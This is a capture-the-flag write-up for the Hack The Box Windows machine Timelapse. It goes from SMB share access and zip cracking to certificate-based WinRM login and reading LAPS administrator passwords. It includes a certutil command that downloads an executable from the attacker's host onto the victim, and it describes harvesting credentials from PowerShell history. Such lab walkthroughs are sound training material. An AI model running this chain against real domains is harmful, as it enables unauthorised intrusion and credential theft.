Timelapse

Timelapse is an easy Windows machine and while some HTB machine names has something to do with how to exploit them this particular machine name is vague and actually relates to Local Administrator Password Solution (LAPS), absolutely nothing to do with time.

LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset. you can read more about it here

Enumeration

As usual, we fire up Nmap to see what services are running

nmap -Pn -T4 -p- -A 10.10.11.152

• -Pn: Treats host as online, in case ICMP is disabled on the machine

• -T4: Timing Template to hasten up scan (default is T3)

• -p-: Scan all 65535 ports instead of the default 1000 well-known-ports

• -A: This option enables additional advanced and aggressive options.

The SMB looks interesting since it's a file-sharing service, it's possible it contains helpful files. to check this let's use "smbclient",

after running smbclient we see some Sharenames but some are empty and we get "denied access" message in some except "Shares"

Let's access "Shares", as seen below we found two Folders as well as some files. we can transfer these files to our system with the "get" command

All the documents are simply manuals for LAPS and has no sensitive data or credentials. The zip file on the hand is interesting as it's password protected.

With zip2john, we are able extract the password hash and use john to crack the hash. The extracted file content is a single file named "legacyy_dev_auth.pfx", a little and you might find something like this on pfx.

User

so, we have a pfx file, what we have to do now is extract both the private_key and certificate from this file.

We will be doing this using openssl and this stackoverflow article would be of great help.

as seen below, both private key and certificate has been created, next step is to utilize these keys

After creating certificate and key, we login into the host using evil-winrm with the created certs.

Evil WinRM is the ultimate WinRM shell for pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol.

As seen below, we login as user legacyy with the certs

Doing a little user enumeration, we found other users on the system but we can't really say whether they are system users or created by other HTB players. using net user legacyy tells us a bit more about the user we are currently logged in as.

Privilege Escalation

we have user, now to escalate our privilege to SYSTEM, let's upload WinPEAS. WinPEAS is a tool that scans the system for possible privilege escalation vulnerabilities. it can be downloaded here

we set up a python server on our system :

python3 -m http.server

then run the below command on the victim machine to transfer file,

We can achieve the same aim using the command:

certutil -urlcache -f http://10.10.14.113:8000/winPEASx64.exe C:\Users\legacyy\winPEASx64.exe

After running WinPEAS we found an interesting powershell history text file

CD into this directory and we found some powershell commands that includes password for user "svc_deploy", let's replay these commands

After running the exact commands in the file, we are able to run commands as user svc_deploy as seen below

Now, let's check what groups user svc_deploy belongs to...

...as seen below, user belongs to a local group of LAPS_Readers.

Knowing we have read access to LAPS, it means we can query Active Directory with the "Get-ADComputer" command to get the admin password and as we can see "ms-Msc-AdmPwd" holds the domain controller's password

with evil-winrm once again, we were able to login as "Administrator" without breaking a sweat.

checking "C:\Users\Administrator\Desktop" the flag was not there, well, it's actually located under another admin user home account "C:\Users\TRX\Desktop"

Hope you have same fun as I did rooting this box...Cheers!!!